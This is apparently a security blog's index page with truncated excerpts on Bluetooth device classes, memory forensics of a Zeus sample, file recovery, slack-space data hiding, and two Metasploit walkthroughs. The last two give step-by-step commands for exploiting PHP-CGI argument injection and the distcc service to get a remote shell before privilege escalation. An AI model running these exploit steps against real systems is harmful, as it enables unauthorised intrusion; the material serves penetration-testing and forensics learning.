Posts

Service And Device Class of Bluetooth

Image
The following are some of the list of services and devices in the class that we can use to bluetooth exploitation. 1. List Bluetooth Class Device AUDIO_VIDEO (Value: 0x00000400) COMPUTER (Value: 0x00000100) HEALTH (Value: 0x00000900) IMAGING (Value: 0x00000600) MISC (Value: 0x00000000) NETWORKING (Value: 0x00000300) PERIPHERAL (Value: 0x00000500) PHONE (Value: 0x00000200) TOY (Value: 0x00000800) UNCATEGORIZED (Value: 0x00001f00) WEARABLE (Value: 0x00000700) 2. List Bluetooth Class Service AUDIO (Value: 0x00200000) CAPTURE (Value: 0x00080000) INFORMATION (Value: 0x00800000) LIMITED_DISCOVERABILITY (Value: 0x00002000) NETWORKING (Value: 0x00020000) OBJECT_TRANSFER (Value: 0x00100000) POSITIONING (Value: 0x00010000) RENDER (Value: 0x00040000) TELEPHONY (Value: 0x00400000) HOW TO..??? hciconfig = is used to configure Bluetooth devices. hci0 = the name of a Bluetooth device installed in the system. for help use this command: hciconfig --help def

Forensic - Zbot Trojan Horse Analysis

Image
Zeus or Zbot Trojan Horse is a computer malware running on the computer under the Microsoft Windows operating system version, this is done attacker to perform malicious tasks such as stealing banking information etc.. you can continue it  here Volatility testing this time I have received a file that has been in infections by Zeus Trojan named " zeus.vmem " 1.) The first stage uses the command " imageinfo " Identify information for the image. root@Double-H : ~ # vol -f ~/Desktop/Zeus/zeus.vmem imageinfo -f = filename imageinfo = Identify information for the image next, we can use the command " pslist " to display a list of the overall process on the file " zeus.vmem " command: root@Double-H : ~ # vol -f ~/Desktop/Zeus/zeus.vmem pslist seen in the picture above we have not found something strange, then we can try to call the command " connscan " to see if the file make a connection command: root@D

Forensic - File Recovery (Fire With Metasploit)

Image
Hy guy's.. missing me...? yeah, I think most of you guys looking forward to my post =)) as I promised earlier this year I will be a lot to discuss about forensic. so, go see my writing this time. Equipment: 1. Metasploit Note : make sure you get to this stage meterpreter session The next stage of selecting module " enum_drives ". This module will list the physical drives and logical volumes msf > use post/windows/gather/forensics/enum_drives msf post( enum_drives ) > show options msf post( enum_drives ) > set SESSION 1 msf post( enum_drives ) > run there are multiple logical volumes that look, then I choose the drives " E " for the test module by selecting " recovery_files ". This module list and try to recover deleted files from NTFS file systems msf post( enum_drives ) > use post/windows/gather/forensics/recovery_files msf post( recovery_files ) > show options msf post( recovery_files ) > set SESSION

Forensic - Data Hiding

Image
This year I will most likely be many issues to discuss his forensic know many people who have not been involved in the forensic world , there are many who think that the forensic difficult , I suggest to you to keep a lot of reading and learning so that what you think is hard to be easy . as a prefix, I will discuss how to conceal messages into a file that contains the slack space Description : slack space is a space is not in use. This block is sized container that is in use by the file system to store data. Because it Occurs naturally the data rarely fill fixed storage locations exactly. in forensic slack space in check as they may contain important data. Download Bmap tools here Configuration: extract this file : tar -xzvf bmap-1.0.17.tar.gz cp -r bmap-1.0.17 /opt/ cd /opt/bmap-1.0.17 ; ls then, compile this script using command : # make after compiling a directory bmap refer back to appear as shown below : How To : I created a file with the exten

Exploit php Injection obtain user Hashes

Image
Hello all. Did you still loyal to my posts ? :) on this occasion I will show a few ways for you who likes to do penetration testing . as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome. at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x Description:   When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable   to an argument injection vulnerability . This module takes advantage   of the- d flag to set php.ini directives to Achieve code execution . (you can find the complete information when using a module that we use to type in the info ) ok, now i will show you about that :) open your metasploit using command: # msfconsole then type this command for use the module : command: msf > use exploit/multi/http/php_cgi_arg_injection msf exploit( php_cgi_arg

[Video] Local Exploit Privilege Escalation

Image
Hay guys tonight i will share how to get root privileges to start utilizing the vulnerability gap that exists on the machine "distcc". about distcc: Distcc is designed to speed up compilation by taking advantage of unused processing on another computer. How to : 1. scann the target using the command: nmap -p 1-56635 -sS target-ip-addr then look for port 3633 (distccd) 2. Open your metasploit and enter this command: msf > use exploit/unix/misc/distcc_exec msf exploit( distcc_exec) > set RHOST 192.168.1.10 RHOST => 192.168.1.10 msf exploit( distcc_exec ) > set PAYLOAD cmd/unix/bind_ruby PAYLOAD => cmd/unix/bind_ruby msf exploit( distcc_exec ) > exploit wait until the command shell session opened 3. then use this command : uname -r ( kernel version ) whoami ( print the user name associated with the current effective user ID ) this stage we do not get user id root. so, let's get started privilege escalation make sure the ker